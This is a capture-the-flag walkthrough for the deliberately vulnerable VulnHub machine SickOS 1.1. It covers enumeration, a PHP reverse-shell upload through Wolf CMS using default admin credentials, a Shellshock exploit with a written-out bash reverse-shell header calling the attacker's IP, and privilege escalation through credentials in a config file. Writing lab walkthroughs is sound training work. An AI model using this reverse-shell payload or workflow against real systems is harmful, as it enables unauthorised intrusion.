SICKOS 1.1
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1
- SickOS 1.1 can be downloaded from here:
https://www.vulnhub.com/entry/sickos-11,132/
- Once downloaded and extracted with WMware:
2 - ENUMERATION
- Using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:
- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):
- Configuring the Firefox Connection Settings for the discovered HTTP proxy (192.168.1.15:3128)
- Connecting with the browser:
- Viewing the source there is nothing interesting:
- Let's explore the website structure with dirb:
- Looking at the robots.txt file:
- Exploring the folder /wolfcms:
- Using dirb against wolfcms:
- Looking inside the public folder:
- Using nikto to discover potential vulnerabilities:
- The most remarkable result is that /cgi-bin/status is vulnerable to shellshock vulnerability:
3 - EXPLOITATION
- Let's try two ways to exploit the vulnerable machine.
3.1 - Uploading a webshell
- Googling for Wolf CMS vulnerabilities:
- Going back to /wolfcms we learn that there is an Administrator:
- Reading from the previous description of the vulnerability:
- Let's explore the admin option:
- Trying admin:admin the authentication works:
- Going to the Files tab there is an Upload File function:
- Up to this point, why not to upload a webshell?
- Kali Linux has got some webshells available:
- For instance, let's explore php-reverse-shell.php.
- Opening the file we see that there are two parameters that must be changed or adapted to our neeeds (IP and port to connect):
- Copying the webshell to a working folder so that we can manipulate it without losing the original version:
- Opening the webshell and modifying IP and port:
- Now it is ready to be uploaded to the vulnerable machine:
- We find php-reverse-shell.php at the /public folder:
- Before running it, let's establish a netcat listening session on port 3333:
- Running the webshell:
- The attack is successful, and a limited shell is achieved at the attacker's side:
3.2 - Shellshock
- Now, let's try to exploit the site taking advantage of the shellshock vulnerability
https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/
- We can check that the cgi script uses bash as interpreter because the path gives us uptime/uname result inside a Json string:
- Setting up a netcat listening session on port 4444:
- Let's craft a command curl to achieve a reverse shell:
https://curl.haxx.se/docs/manpage.html
https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
- The parameters used in this case:
- - x (proxy) = 192.168.1.15:3128
- -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1
- target = http://192.168.1.15/cgi-bin/status
- A limited shell is achieved at the attacker's side:
4 - PRIVILEGE ESCALATION
- Listing the folder /var/www:
- Listing wolfcms:
- Opening config.php we find interesting credentials for the user root:
- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow to use the sudo command:
- Importing a tty terminal so that we can run a /bin/bash shell:
- Trying again, su works but the authentication fails:
- Remembering the current user:
- Let's move to another user, for instance sickos:
- Now the authentication is correct:
- Finally a root shell is achieved:
- Also, we could reach to same point by SSH-ing with the sickos user account:
- Surprisingly, sickos is a complete sudoer:
- Also:
5 - CAPTURING THE FLAG
- Reading the flag:
- By the way, the flag's name is an MD5 encryption string:
- Decrypting it results to be bleh!!
